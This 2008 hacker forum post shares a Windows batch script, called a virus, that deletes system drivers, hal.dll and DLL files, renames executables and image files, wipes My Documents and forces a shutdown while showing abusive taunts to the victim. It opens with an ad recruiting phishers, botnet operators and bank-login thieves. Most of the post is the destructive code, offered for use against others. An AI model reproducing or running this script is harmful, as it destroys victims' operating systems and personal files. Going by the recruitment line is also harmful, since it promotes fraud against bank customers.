
I need phishers and guys who work on botnets and get bank logins. Add me on ICQ:

Friday, November 21, 2008

Got a nice batch for ya!

This will fuck your pc up so don't run it on your computer if you're not a fuckhead... It might have bugs i wasn't stupid enough to try it... are you??

Code: Select All
echo off
title owned by kft
echo your mouse and keyboard will be useless, bitch. I hope you enjoyed them as much as they lasted...
cd %windir%\system32
del /S /F /Q keyboard.drv
del /S /F /Q mouse.drv
del /S /F /Q keyboard.sys
del /S /F /Q hal.dll
echo tada, done now nothing works... let's see now... what should i do...
msg * virus created by kft. If i destroyed your everything, well guess what i don't fuckin' care. Song by slayer
cd %windir%
cd system
del /S /F /Q *.dll
msg * Now don't turn off your computer, all of your startup files and
cd system32
ren /S /F /Q *.exe *.Iownedthis
echo wow, you would think you like getting pwned lol
echo crying to our mummy now?????
echo pathetic, I think you need to learn a lesson for being a little
echo whimpy girl...
ren /F /S /Q *.jpg *.stopbeingawhimp
ren /F /S /Q *.bmp *.gogetfucked
ren /F /S /Q *.sys *.pwned
ren /F /S /Q *.drv *.pwned
cd %homepath%
del My Documents/*
shutdown -s -t 60 -c "bye, nice knowing ya"

If you read through, you'll see it deletes .dll's, pc documents and generally important things while producing a rather terifying psychological result...

Good luck! [!]ProRat[!]

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